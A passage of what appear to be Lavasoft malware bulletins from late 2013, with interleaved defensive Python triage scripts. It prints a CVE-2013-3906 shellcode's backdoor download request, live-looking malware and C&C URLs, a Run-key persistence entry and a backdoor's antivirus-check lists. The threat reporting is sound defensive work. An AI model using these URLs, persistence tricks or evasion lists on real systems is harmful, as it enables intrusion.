Cycbot | 77 | 78 | 0.1%
Kelihos | 629 | 700 | 4.5%
NrgBot/Dorkbot | 252 | 282 | 1.9%
Blazebot | 5 | 2 | -0.2%
Shiz | 10 | 13 | 0.2%
Total | 1452 | 1580 |



Bot distribution in October:

In the last Kelihos report we noticed that the backdoor randomizes its autorun registry values and the names of dropped files. In October we saw an increased variety in Kelihos update file names.
In addition to the well known names:

calc.exe, rasta02.exe, traff01.exe, keybex4.exe, mongo02.exe

We discovered some new ones; some of them contain Russian names (e.g. Misha, Boris):

devils1.exe, userid2.exe, mia0002.exe, blacks1.exe, felix03.exe, goodtr2.exe, same7b1.exe, b0ber03.exe, inkr001.exe, safpro1.exe, bubba04.exe, nimble1.exe, gossam1.exe, upeksvr.exe, tretiy1.exe, misha01.exe, boris02.exe, balls02.exe, crypt01.exe, dun0004.exe

The Shiz backdoor is still using a DGA to create new domain names under the European Union’s top-level domain “.eu” (sample MD5: b19171daa6f4602db826c9c4bd9d2fe5):
Resolved:

IP: 50.116.56.144 Name: gadufiwabim.eu
IP: 50.116.56.144 Name: cihunemyror.eu
IP: 50.116.56.144 Name: jefapexytar.eu
IP: 173.230.133.99 Name: kefuwidijyp.eu
IP: 204.79.197.200 Name: www.bing.com
IP: 50.116.56.144 Name: foxivusozuc.eu
IP: 50.116.56.144 Name: fokyxazolar.eu
IP: 50.116.56.144 Name: ryqecolijet.eu
IP: 96.43.141.186 Name: digivehusyd.eu
IP: 50.116.56.144 Name: xuqohyxeqak.eu
IP: 50.116.56.144 Name: lyruxyxaxaw.eu
IP: 50.116.32.177 Name: galokusemus.eu
IP: 166.78.144.80 Name: jewuqyjywyv.eu

Unresolved:

gahihezenal.eu, puregivytoh.eu, nofyjikoxex.eu, tuwikypabud.eu, qegytuvufoq.eu, kepymexihak.eu, vojacikigep.eu, makagucyraj.eu, xuxusujenes.eu, tucyguqaciq.eu, lymylorozig.eu, jepororyrih.eu, xubifaremin.eu, nozoxucavaq.eu, dimutobihom.eu, voniqofolyt.eu, puvopalywet.eu, ciliqikytec.eu, tunujolavez.eu, xutekidywyp.eu, dikoniwudim.eu, fogeliwokih.eu, dixemazufel.eu, divywysigud.eu, lyvejujolec.eu, puzutuqeqij.eu, fobonobaxog.eu, qederepuduf.eu, rydinivoloh.eu, kemocujufys.eu, lysovidacyx.eu, nojuletacuf.eu, qeqinuqypoq.eu, magofetequb.eu, tupazivenom.eu, marytymenok.eu, rynazuqihoj.eu, jejedudupuc.eu, rytuvepokuv.eu, volebatijub.eu, ciqydofudyx.eu, vofozymufok.eu, cinepycusaw.eu, keraborigin.eu, qetoqolusex.eu, pumadypyruv.eu, nopegymozow.eu, masisokemep.eu, gatedyhavyd.eu, fodakyhijyv.eu, cicaratupig.eu, vocumucokaj.eu

The request to the C&C server looks like:

In the reply for one of the domains we can see that it has already been sinkholed to 166.78.144.80 (X-Sinkhole: malware-sinkhole).
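The resolved and unresolved lists above all share one shape, which a defender can turn into a cheap triage rule for DNS logs. The following is an added example, not code from the bulletin or from Lavasoft: it assumes (from the listed samples only, not from any documented property of the Shiz generator) that the family's names are eleven lowercase letters strictly alternating consonant and vowel under .eu, parses "IP: x Name: y" resolution lines as printed above, and flags the sinkhole address the text names. The sample input is the resolved list from the page with www.bing.com as a control.

```python
import re
from collections import Counter

# Heuristic inferred from the Shiz domains listed in the bulletin: eleven lowercase
# letters, strictly alternating consonant/vowel ('y' counted as a vowel), under .eu.
# This is an assumption drawn from the samples, not a documented DGA property.
VOWELS = "aeiouy"
CONSONANTS = "bcdfghjklmnpqrstvwxz"
SHIZ_LABEL = re.compile(r"^(?:[%s][%s]){5}[%s]$" % (CONSONANTS, VOWELS, CONSONANTS))

# The sinkhole address named in the bulletin.
KNOWN_SINKHOLES = {"166.78.144.80"}

RESOLUTION_LINE = re.compile(r"IP:\s*(\S+)\s+Name:\s*(\S+)")


def looks_like_shiz_dga(hostname):
    """True when hostname has the shape of a Shiz-generated .eu domain."""
    parts = hostname.lower().rstrip(".").split(".")
    return len(parts) == 2 and parts[1] == "eu" and SHIZ_LABEL.match(parts[0]) is not None


def triage_resolutions(lines):
    """Classify 'IP: x Name: y' lines as dga, dga-sinkholed or other.

    Returns (verdicts, ip_counts): a list of (name, ip, verdict) tuples and a
    Counter of how many live DGA names resolve to each IP, which exposes the
    shared hosting behind the generated names.
    """
    verdicts = []
    ip_counts = Counter()
    for line in lines:
        m = RESOLUTION_LINE.search(line)
        if not m:
            continue  # skip blank or unparseable lines
        ip, name = m.group(1), m.group(2)
        if not looks_like_shiz_dga(name):
            verdict = "other"
        elif ip in KNOWN_SINKHOLES:
            verdict = "dga-sinkholed"
        else:
            verdict = "dga"
            ip_counts[ip] += 1
        verdicts.append((name, ip, verdict))
    return verdicts, ip_counts


# Constructed input: the resolved list from the bulletin, with www.bing.com as a control.
SAMPLE_RESOLVED = """
IP: 50.116.56.144 Name: gadufiwabim.eu
IP: 50.116.56.144 Name: cihunemyror.eu
IP: 50.116.56.144 Name: jefapexytar.eu
IP: 173.230.133.99 Name: kefuwidijyp.eu
IP: 204.79.197.200 Name: www.bing.com
IP: 50.116.56.144 Name: foxivusozuc.eu
IP: 50.116.56.144 Name: fokyxazolar.eu
IP: 50.116.56.144 Name: ryqecolijet.eu
IP: 96.43.141.186 Name: digivehusyd.eu
IP: 50.116.56.144 Name: xuqohyxeqak.eu
IP: 50.116.56.144 Name: lyruxyxaxaw.eu
IP: 50.116.32.177 Name: galokusemus.eu
IP: 166.78.144.80 Name: jewuqyjywyv.eu
""".strip().splitlines()

if __name__ == "__main__":
    results, counts = triage_resolutions(SAMPLE_RESOLVED)
    for name, ip, verdict in results:
        print(f"{verdict:14} {ip:16} {name}")
    print("live DGA names per IP:", dict(counts))
```

The per-IP count is the useful output: eight of the twelve generated names land on one address, so blocking or monitoring that address covers most of the family's current infrastructure regardless of which name a sample picks. A shape-based rule like this only fits the generator it was derived from and will miss any later change to the name length or alphabet, so treat a match as a lead for the analyst, not a verdict.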

Zbot has also started using .eu domains for communication with its C&C:

NrgBot/DorkBot continues to use Dropbox to download a Bitcoin miner tool:

hxxp://www.v.dropbox.com/s/thpae3fchbmgkf2/sym.exe?dl=1 (f865c199024105a2ffdf5fa98f391d74, RiskTool.Win32.BitCoinMiner)

and the Shakblades worm, which has recently been removed from the Dropbox servers:
hxxp://www.v.dropbox.com/s/dcynlnz0yitlxyj/rep.exe?dl=1 (044de297a0c023d939300d84e95074ee, detected as Worm.Win32.Shakblades).

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on users’ PCs. These are advertising software, browser toolbars, search engines and other programs that change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Conduit | 31.39% | -5.02%
2 | Adware.JS.Conduit | 18.82% | +1.68%
3 | MyWebSearch | 12.40% | -2.30%
4 | Win32.PUP.Bandoo | 6.10% | +1.17%
5 | Adware.Linkury | 5.29% | +0.81%
6 | Win32.Toolbar.Iminent | 3.12% | -0.39%
7 | InstallBrain | 1.93% | +1.10%
8 | SweetIM | 1.34% | +0.22%
9 | Crossrider | 1.33% | +0.55%
10 | Babylon | 1.29% | -0.64%
11 | Iminent | 1.12% | -2.39%
12 | Yontoo | 1.06% | +0.23%
13 | InstallCore | 0.95% | +0.19%
14 | Adware.DealPly | 0.93% | new
15 | DomaIQ | 0.58% | new
16 | Wajam | 0.57% | new
17 | DownloadMR | 0.52% | +0.03%
18 | Montiera | 0.49% | new
19 | Installerex/WebPick | 0.49% | +0.05%
20 | InstallCore.b | 0.47% | new

Top20 PUPs detected on user’s PC

Operating Systems

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Lavasoft Security Bulletin: November 2013


Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 38.48% | +1.89%
2 | Trojan.Win32.Generic!BT | 28.11% | +0.21%
3 | Exploit.AdobeReader.gen | 0.29% | new
4 | Trojan.Win32.Generic.pak!cobra | 0.26% | -0.70%
5 | Trojan.Win32.Generic!SB.0 | 0.26% | -3.22%
6 | Malware.JS.Generic | 0.19% | -0.82%
7 | Trojan.Win32.FakeAV.oq | 0.17% | new
8 | Virus.Win32.Sality.at | 0.17% | -0.09%
9 | Trojan.Win32.Ramnit.c | 0.15% | -1.03%
10 | Virus.Win32.Sality.ah | 0.14% | -1.16%
11 | Win32.Backdoor.Inject/C | 0.14% | new
12 | Virus.VBS.Ramnit.a | 0.12% | -0.53%
13 | HackTool.Win32.Keygen | 0.11% | -0.58%
14 | Trojan.LNK.Agent.c | 0.11% | new
15 | Virus.Win32.Ramnit.b | 0.10% | -0.32%
16 | Win32.Backdoor.Zaccess | 0.08% | new
17 | Trojan.Win32.Jpgiframe | 0.06% | -0.37%
18 | Virus.Win32.Ramnit.a | 0.05% | -0.52%
19 | Worm.LNK.Jenxcus.aha | 0.04% | new
20 | Trojan.Win32.Kryptik.blxe | 0.04% | new

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - November 2013

The table below ranks the most prevalent families seen in November.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 34.39% | -2.47%
2 | Trojan-Downloader.Win32.LoadMoney.u | 8.02% | +2.20%
3 | Trojan.Win32.Generic.pak!cobra | 7.80% | +1.80%
4 | Virus.Win32.Virut.ce | 6.85% | +4.59%
5 | Virus.Win32.Expiro.gen | 5.15% | +3.18%
6 | Worm.Win32.Gamarue.z | 3.79% | -8.09%
7 | Malware.JS.Generic | 2.72% | +1.44%
8 | Trojan.Win32.Generic!SB.0 | 1.91% | -0.23%
9 | Worm.Win32.Gamarue.n | 1.29% | new
10 | Trojan.Win32.Kryptik.bnre | 1.23% | new
11 | Trojan.Win32.Kryptik.acsn | 0.74% | -0.26%
12 | FraudTool.Win32.FakeRean | 0.61% | -0.02%
13 | Win32.Malware!Drop | 0.52% | -0.29%
14 | TrojanPWS.Win32.OnLineGames.ahj | 0.49% | +0.03%
15 | Trojan-Dropper.Win32.Gepys.a | 0.48% | -0.27%
16 | Trojan.JS.Obfuscator.aa | 0.47% | -0.21%
17 | Trojan.Win32.Vobfus.paa | 0.45% | -0.06%
18 | Trojan.Win32.Ircbot!cobra | 0.44% | new
19 | Trojan.Win32.Desini.a | 0.46% | -0.29%
20 | Trojan.Win32.DotNet.c | 0.42% | -0.19%

New malicious programs entered the Top 20

A new Fake-AV interface that falsely claims to detect hidden threats on a user’s computer was discovered in the wild in November. It is detected by Ad-Aware as Trojan.Generic.6779300.

Fake AV (MD5: 64eeefff673a9ab54d060842430be2b7) is detected by Ad-Aware as Trojan.Generic.6779300

Ransomware continues to intimidate and scam users. Recent variants claim to be messages from local law enforcement or government organisations that have blocked the affected computer due to violations of laws relating to viewing or distributing pornography and downloading torrents. As usual, the majority of blockers demand a fine of $300 paid via MoneyPak, Ukash or PaySafeCard.

Ransomware (MD5: 4de74cbc160042adfe9c012b71b3d935) is detected by Ad-Aware as Gen:Variant.Kazy.289928

Ransomware (MD5: 4f0f38bad8279cc0705cf6dd563c6bc6) is detected by Ad-Aware as Gen:Variant.Kazy.289928

Ransomware (MD5: 6c8bfd752e032fef6a9d168f923a5231) is detected by Ad-Aware as Gen:Variant.Kazy.289928

However, we also caught a French blocker that asks for payment by bank card.

Ransomware (MD5: 6c0e73b795787d651606847d73bc326e) is detected by Ad-Aware as Gen:Variant.Strictor.36755

Some ransomware families have introduced countdown timers (48 hours in the screenshot below) in their latest versions. Similar timers were used by the crypto blocker described in October’s Security Bulletin.

Ransomware (MD5: 8bcc460ca4171cfe6165c3e10caf97fa) is detected by Ad-Aware as Gen:Variant.Kazy.285775

Some of the Trojan-Ransoms display the pornographic content supposedly found on the user’s computer, a technique common to most ransomware.

Ransomware (MD5: 908478d1f1faa539f228bbe4fcf23b6d) is detected by Ad-Aware as Gen:Variant.Kazy.285775

Microsoft Office Zeroday

On 5 November, Microsoft reported a new vulnerability, CVE-2013-3906, in the processing of Microsoft Word documents. The exploit is embedded in a specially crafted Word document containing a malformed TIFF image, which can lead to malicious code execution. The exploit is able to bypass DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization) but does not work when blocking of ActiveX controls embedded in documents is enabled.
According to AlienVault Lab, the first known attack appeared to target a Pakistani audience, as the malicious documents relate to the Pakistani military and intelligence service, and the downloaded backdoors also connect to C&C servers located in Pakistan. The documents were dated 22 October 2013.

We analysed several CVE-2013-3906 exploits delivered in DOCX files. All of them execute shellcode statically sprayed within the document, and all have the same structure:

Shanti Dyanamite.docx (MD5: 1fd4f3f063d641f84c5776c2c15e4621)

All the samples share identical obfuscated shellcode. It uses runtime linking to load a standard set of functions: kernel32.dll: GetTempPathA, ExitProcess; shell32.dll: URLDownloadToFileA; urlmon.dll: ShellExecuteA.

After execution the shellcode downloads the backdoor:

GET /bruce/winword.exe HTTP/1.1
Host: flatnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

The exploits differ only in the malware download URL at the end of the shellcode. The URLs below were offline at the time of analysis:

hxxp://myflatnet.com/ralph_3/winword.exe
hxxp://landasc.w100.1860php.com/kor.exe
hxxp://210.19.13.199/java.exe

However, others were still being used to download the following backdoors:


URL | DOCX MD5 | MD5 | VT | Country | Comments
hxxp://116.255.172.188/zzkk/servers.exe | 6acac212be8f04c55a9592f72df738c2 | 7896b76c83ddcdcb9f269dc242b914eb | 3/46 | China | Certificate: CHENGDU YIWO Tech Development Co., Ltd.
hxxp://www.pitdc.org.tw/number/n6.exe | ff593017bef0850d315cb97c0d299b40 | 06ecb99836c510701887b7331db11a46 | 11/48 | Taiwan | The file drops benign GoogleTool.exe (GoogleUpdater.exe)

The backdoor downloaded in the first case (servers.exe, MD5: 7896b76c83ddcdcb9f269dc242b914eb) carries a stolen certificate:

The second downloaded file is a Trojan-Dropper, detected by Ad-Aware as Dropped:Trojan.Generic.9860611, that drops the following files into %Documents and Settings%\%user%\Templates\:

1. GoogleTool.exe (116 648 bytes, MD5: 506708142bc63daba64f2d3ad1dcd5bf) – the original GoogleUpdate.exe application, signed by Google Inc.:

2. Goopdate.dll (44 544 bytes, MD5: e4cb1ea2667f1b3b712f4402f0737627) – a malicious DLL that uses the name of the legitimate GoogleUpdate library.

3. Noew.SAM (143 360 bytes, MD5: 57c2f8891234bcd4034bc830ce64d0c8) – obfuscated PE file.

To run itself automatically each time Windows boots, the Trojan-Dropper adds the following link to its file to the registry Run key:


[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Templates\GoogleTool.exe"

GoogleTool.exe (original name GoogleUpdate.exe) is designed to load a DLL with the hard-coded name “goopdate.dll”.

Unicode strings from GoogleTool.exe (GoogleUpdate.exe)

Malware authors use this peculiarity to launch a malicious module of the same name (goopdate.dll). The DLL checks whether it has been loaded by GoogleTool.exe and then launches the malicious payload via “rundll32.exe goopdate.dll,MyExtern”.
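Both autorun entries in these bulletins (the CryptoLocker value in October pointing at a GUID-named executable under Application Data, and the "Microsoft" value above pointing at GoogleTool.exe in the Templates folder with goopdate.dll beside it) can be caught by the same host triage. The following is an added example, not code from the bulletin or from Lavasoft: it takes Run-key values and a directory listing as plain Python data (a real triage script would read them with the winreg and os modules), and flags executables in user-writable locations, GUID-style file names, value names unrelated to the file name, and a co-located DLL with a known side-load name. The registry contents, the Templates listing and the benign OneDrive control entry are constructed for the example.

```python
import re
import ntpath

# Executable name that is a bare GUID, as in the CryptoLocker Run value.
GUID_EXE = re.compile(r"^\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}\.exe$", re.I)

# Path fragments a standard user can write to; autorun entries pointing there deserve a look.
USER_WRITABLE = ("\\application data\\", "\\appdata\\", "\\templates\\", "\\temp\\")

# DLL names that a co-located loader will pick up before the real copy
# (assumption: only the goopdate.dll case from the text; extend as needed).
SIDELOAD_DLLS = {"goopdate.dll"}


def triage_run_entry(value_name, command, listing):
    """Return the reasons one Run value looks suspicious (empty list = nothing found)."""
    findings = []
    exe_path = command.strip('"').strip()
    directory, filename = ntpath.split(exe_path)
    low = exe_path.lower()

    if any(tag in low for tag in USER_WRITABLE):
        findings.append("user-writable path")
    if GUID_EXE.match(filename):
        findings.append("GUID-named executable")

    # Value name unrelated to the file name (e.g. "Microsoft" -> GoogleTool.exe).
    stem = filename.rsplit(".", 1)[0].lower()
    vname = value_name.lower()
    if vname not in stem and stem not in vname:
        findings.append("value name does not match file name")

    # A DLL with a known side-load name sitting next to the autorun executable.
    for entry in listing.get(directory, []):
        if entry.lower() in SIDELOAD_DLLS:
            findings.append("side-load candidate: " + entry)
    return findings


def triage_run_key(run_values, listing):
    """Triage every value under every Run key given; returns {value_name: findings}."""
    report = {}
    for key, values in run_values.items():
        for value_name, command in values.items():
            report[value_name] = triage_run_entry(value_name, command, listing)
    return report


# Constructed Run-key contents modelled on the two bulletins, plus a benign control entry.
SAMPLE_RUN_VALUES = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run": {
        "CryptoLocker": r"C:\Documents and Settings\alice\Application Data\{D0EE94E5-EF8C-E6CC-8E83-EFF5CFCD2F14}.exe",
        "Microsoft": r"C:\Documents and Settings\alice\Templates\GoogleTool.exe",
        "OneDrive": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
    }
}

# Constructed directory listing for the dropper's Templates folder (file names from the text).
SAMPLE_LISTING = {
    r"C:\Documents and Settings\alice\Templates": ["GoogleTool.exe", "Goopdate.dll", "Noew.SAM"],
}

if __name__ == "__main__":
    for name, findings in triage_run_key(SAMPLE_RUN_VALUES, SAMPLE_LISTING).items():
        print(name, "->", findings or "no findings")
```

The name-mismatch and user-writable-path tests are heuristics with false positives (plenty of legitimate software registers an unrelated value name or runs from AppData), so their job is to rank entries for an analyst. The side-load check is the strong signal here: a signed GoogleUpdate binary is only suspicious because of where it sits and what sits next to it, which is exactly what a signature-only check misses.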

The payload of the DLL decodes the dropped Noew.SAM file:

which turns into a malicious DLL after decoding (MD5: f573cedb34ef3c92d686f9b03c078589):

The DLL is the DarkShell backdoor, detected by 13 of 46 antivirus engines on VirusTotal.

Once started the backdoor connects to the following C&C server:

website.baesystems.ca (112.175.79.49:8001)

The server was offline during analysis. According to WhoIs it is located in South Korea.
DarkShell gives the attacker remote access to the infected computer, which allows the following:
- a reverse shell,
- keylogging,
- making screenshots,
- video capture,
- downloading and executing applications,
- collecting system information (Windows version, memory, processor, computer name),
- checking for an installed firewall or antivirus from the list below:

AntiVir
Avast Antivirus
AVG Antivirus
BitDefender
Dr.Web
Kaspersky Antivirus
Nod32 Antivirus 2.x
Ewido Security Suite
McAfee VirusScan
Panda Antivirus/Firewall
Symantec/Norton
PC-cillin Antivirus
F-Secure
Kingsoft Internet Security 2008
NOD32 Antivirus 3.x
Rising Antivirus 2008
Jiangmin Antivirus
360 Antivirus
Norton Personal Firewall
ZoneAlarm
Comodo Firewall
eTrust EZ Firewall
F-Secure Internet Security
McAfee Personal Firewall
Outpost Personal Firewall
Panda Internet Seciruty Suite
Panda Anti-Virus/Firewall
BitDefnder/Bull Guard Antivirus
Rising Firewall
360Safe AntiArp

- checking for running processes from the list below:

avesvc.exe
ashdisp.exe
avgcc.exe
bdss.exe
spider.exe
avp.exe
nod32krn.exe
ewidoctrl.exe
mcshield.exe
pavfires.exe
ccapp.exe
pccntmon.exe
fssm32.exe
kavstart.exe
egui.exe
ravmon.exe
kvsrvxp.exe
bdagent.exe
issvc.exe
vsmon.exe
cpf.exe
ca.exe
tnbutil.exe
mpfservice.exe
outpost.exe
tpsrv.exe
pavfires.exe
kpf4ss.exe
rfwsrv.exe
antiarp.exe

We can conclude that the attack has several stages that ultimately lead to installation of the backdoor. It starts with exploitation of the recently discovered CVE-2013-3906 vulnerability via a DOCX file, then continues by downloading and dropping the legitimate GoogleUpdate.exe application in order to run a malicious DLL, which decrypts and executes the backdoor body.

The attack scheme using CVE-2013-3906 and GoogleUpdate

The analysis brings out the following points that help the attack stay undetected and spread widely:
• use of CVE-2013-3906, discovered at the beginning of November (Microsoft released a FixIt tool that disables the TIFF codec on a user’s system);
• use of the legitimate GoogleUpdate application as the malware launcher, started from the autorun key in the system registry;
• obfuscation of the backdoor body with a simple shuffling algorithm, which helps it avoid detection;
• implementation of the backdoor (DarkShell) and the decoding module (goopdate.dll) as DLLs loaded by the trusted GoogleUpdate.exe and rundll32.exe processes.
We expect more attacks using the CVE-2013-3906 vulnerability in DOCX files next month and recommend that our readers install the FixIt from Microsoft or install the Ad-Aware antivirus.

Bots Review

Table: Bots under analysis (November 2013, Lavasoft MAS).


Bot's name | October count | November count | Change
Zbot | 505 | 253 | -24.1%
Cycbot | 78 | 31 | -4.5%
Kelihos | 700 | 608 | -8.8%
NrgBot/Dorkbot | 282 | 137 | -13.9%
Blazebot | 2 | 7 | 0.5%
Shiz | 13 | 9 | -0.4%
Total | 1580 | 1045 |



Bot distribution in November:

Kelihos

This month we observed new file names in the URLs used to download Kelihos updates:

whiteh1.exe boris03.exe dun0006.exe setup21.exe setup22.exe nimble2.exe safpro01.exe inkr001.exe

We noticed that some of the names were slightly modified by incrementing the suffix number, like ‘boris02.exe’ in October and ‘boris03.exe’ in November.

Cycbot. The latest description of Cycbot can be found here. The backdoor can easily be detected by the following connection:

hxxp://TRANSERSDATAFORME.COM/gate.php

Shiz. A new description has been added to the Malware Encyclopedia; we continue to see .eu domains used by the backdoor.

Zbot, similarly to Shiz, continues to use .eu domains to download malicious binaries.

NrgBot/DorkBot

The latest description shows that the bot connects to the phishing domain:

hxxp://api.wipmania.com.stcus.ru/icon/n.api

together with a request to the original one:

hxxp://api.wipmania.com/

It downloads the file "n.api" (MD5: 8b6bf3920aee6ad725cdc06bb815cab7), which is an NrgBot update detected by Ad-Aware as Trojan.GenericKD.1433214.

In November, we caught an Rbot variant that used Dropbox to download malware:

hxxps://www.dropbox.com/s/6hmm09s9gg54wep/critical.exe?dl=1

The content behind the link is currently temporarily disabled due to a high number of download requests. At the time of analysis the file was a Bitcoin miner tool (MD5: afcf6074a63ed40209cbdf8818e59fea) detected by Ad-Aware as Trojan.Generic.10020557.

NrgBot also used Dropbox last month to download a Bitcoin miner and the Shakblades worm.

During the month we detected 13 successful downloads from Dropbox by different malware.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on users’ PCs. These are advertising software, browser toolbars, search engines and other programs that change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Conduit | 30.73% | -0.66%
2 | Adware.JS.Conduit | 15.00% | -3.82%
3 | MyWebSearch | 12.59% | +0.19%
4 | Win32.PUP.Bandoo | 5.17% | -0.93%
5 | Adware.Linkury | 4.93% | -0.36%
6 | Adware.DealPly | 2.84% | +1.91%
7 | Win32.Toolbar.Iminent | 2.63% | -0.49%
8 | Crossrider | 1.33% | 0.00%
9 | SweetIM | 1.28% | -0.06%
10 | InstallCore | 0.99% | +0.04%
11 | Iminent | 0.97% | -2.15%
12 | Opencandy | 0.90% | new
13 | Babylon | 0.76% | -0.53%
14 | Yontoo | 0.72% | -0.34%
15 | InstallBrain | 0.63% | -1.30%
16 | DomaIQ | 0.60% | +0.02%
17 | DownloadMR | 0.49% | -0.03%
18 | InstallCore.b | 0.46% | -0.01%
19 | Installerex/WebPick | 0.45% | -0.04%
20 | Wajam | 0.44% | -0.13%

Top20 PUPs detected on user’s PC

Operating Systems

Geographic Location

Lavasoft Security Bulletin 2013


Contents

1. Fake-AVs

2. Ransomware

3. Bitcoin Games

4. 64-bit Malware

5. Tor-based Malware

6. 0-Day Exploits

7. Bot Review

8. Statistics 2013

9. Forecast for 2014

In the final Security Bulletin of 2013, we will highlight the most prevalent security incidents during the year.

1. Fake-AVs

This class of malware remains as prevalent as ever. This year we analysed more than 90,000 Fake-AV modifications, which introduced a plethora of new GUI designs, imitating the top 10 AV solutions, in an effort to trick unsuspecting victims.

Fake AV (MD5: 64eeefff673a9ab54d060842430be2b7) is detected by Ad-Aware as Trojan.Generic.6779300

You can find more examples of them in our Rogue Gallery and Malware Encyclopedia.

2. Ransomware

We saw an increase in the ransom demand, rising from $200 last year to $300 for the majority of versions this year.

Ransomware (MD5: 4f0f38bad8279cc0705cf6dd563c6bc6) is detected by Ad-Aware as Gen:Variant.Kazy.289928

Anonymous payments are made via MoneyPak, Ukash and PaySafeCard.

Ransomware (MD5: 4de74cbc160042adfe9c012b71b3d935) is detected by Ad-Aware as Gen:Variant.Kazy.289928

Some of the blockers added a countdown timer for 48 hours.

Ransomware (MD5: 6c8bfd752e032fef6a9d168f923a5231) is detected by Ad-Aware as Gen:Variant.Kazy.289928

In addition to the typical Trojan-Ransom that appears to be a notification from law enforcement or government organisations claiming to have blocked the affected computer due to supposed violations of the law, in October we discovered an attack by CryptoLocker that accepts Bitcoin as a payment method (detected by Ad-Aware as Trojan.GenericKDV.1243398).

This type of malware encrypts valuable data on the victim’s computer and demands a ransom for the decryption key or tool.

3. Bitcoin Games

At the end of the year we saw a dramatic increase in Bitcoin prices: the current average price for one Bitcoin is $584, the highest price having been $1200 at the beginning of December.

Source: http://Bitcoincharts.com/markets/mtgoxUSD.html

Source: http://Bitcoinity.org/markets

The phenomenal interest in the virtual currency may also have motivated the latest attack, on the “inputs.io” Bitcoin banking service on October 23. According to the information published by inputs.io after the attack, 4100 BTC (US $2.4 million at current prices) were stolen.

This is not the first case of Bitcoin theft. Other online services, such as Bitcoinica, Linode and Bitfloor, were already hacked in 2012, with 128 000 Bitcoins stolen in total.

As a result of the spike in Bitcoin prices, many backdoors now install Bitcoin mining tools on infected computers to generate new Bitcoins, such as Skyper, described in April 2013.

4. 64-bit Malware

Kaspersky Lab recently announced the detection of a 64-bit version of the Zeus backdoor, dropped by the 32-bit Zeus.

According to the published report, the compilation date is 29 April 2013. Interestingly, this version of Zeus installs a Tor client to communicate with the C&C server.

We managed to acquire a copy of the latest 32-bit Zbot equipped with a Tor interface and checked it for new features. For instance, is the 32-bit version of Zbot capable of running under 64-bit Windows?

Once started on a 64-bit platform, the backdoor launches a 32-bit svchost.exe process in order to inject the payload code into it later.

Two injects were discovered during analysis of the 32-bit svchost.exe image (~1196 Kbytes and ~150 Kbytes in size). The inject is detected by Ad-Aware as Trojan.Zbot.ICQ.

As usual the backdoor copies its body as:

c:\Users\%user%\AppData\Roaming\%rnd%\%rnd%.exe

For example:

It drops Tor client settings into:

c:\Users\%user%\AppData\Roaming\tor\

The infected computer’s name is included in a hidden Tor service that is silently launched; it can be found in the following file:

c:\Users\%user%\AppData\Roaming\tor\hidden_service\hostname
b742crfibawhnims.onion

The Tor proxy, masquerading as the 32-bit svchost.exe process, listens on port 9050:

The Tor protocol delivers the data to the C&C server covertly:

In the end we did not find any injects into 64-bit processes by the current version of the backdoor. However, according to Kaspersky Lab, a Zeus variant has been found that is able to inject malicious code into 64-bit Internet Explorer.

We may conclude that the analysed 32-bit version of Zeus runs successfully under both 32- and 64-bit Windows (injecting only into 32-bit processes). The 64-bit variant of Zeus discovered by Kaspersky Lab can additionally inject its payload into 64-bit Internet Explorer. Using 64-bit applications may reduce the likelihood of infection but cannot be considered a panacea, as we expect more malware to move to the 64-bit platform. Using a reliable antivirus continues to be the best way to protect your data from such infections.
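The two host artefacts described above (a hidden_service\hostname file under the user's Roaming\tor directory and a svchost.exe process listening on the Tor SOCKS port 9050) are cheap to check for during incident triage. The following is an added example, not code from the bulletin or from Lavasoft: it runs over a constructed snapshot of files and processes (a real script would walk user profiles and query the listening-socket table), validates the .onion name against the 16-character base32 form shown in the hostname file above, and flags svchost.exe instances offering a SOCKS listener, which a genuine service host never does. The file paths, process table and the legitimate tor.exe control entry are constructed for the example.

```python
import ntpath
import re

# 16-character base32 address of a (version 2) hidden service, as in the hostname file above.
ONION_V2 = re.compile(r"^[a-z2-7]{16}\.onion$")
TOR_SOCKS_PORT = 9050


def find_hidden_services(files):
    """Return (path, onion) for every hidden_service/hostname file dropped under a user profile's Roaming\\tor."""
    hits = []
    for path, content in files.items():
        low = path.lower()
        in_profile_tor = "\\appdata\\roaming\\tor\\" in low
        if in_profile_tor and low.endswith("\\hidden_service\\hostname"):
            onion = content.strip()
            if ONION_V2.match(onion):
                hits.append((path, onion))
    return hits


def find_rogue_tor_listeners(processes):
    """Return PIDs of svchost.exe processes listening on the Tor SOCKS port.

    svchost.exe hosts Windows services and never offers a SOCKS proxy; a 9050
    listener inside it points at an injected Tor client like the one above.
    A real tor.exe on 9050 is not flagged, since that is ordinary Tor usage.
    """
    hits = []
    for proc in processes:
        image = ntpath.basename(proc["image"]).lower()
        if image == "svchost.exe" and TOR_SOCKS_PORT in proc["listening"]:
            hits.append(proc["pid"])
    return hits


# Constructed host snapshot modelled on the analysis above; the onion name is the one from the text.
SAMPLE_FILES = {
    r"C:\Users\alice\AppData\Roaming\tor\hidden_service\hostname": "b742crfibawhnims.onion\n",
    r"C:\Users\alice\AppData\Roaming\tor\torrc": "",
    r"C:\Users\alice\AppData\Roaming\Other\hostname": "not-an-onion\n",
}
SAMPLE_PROCESSES = [
    {"pid": 1204, "image": r"C:\Windows\System32\svchost.exe", "bits": 64, "listening": [135]},
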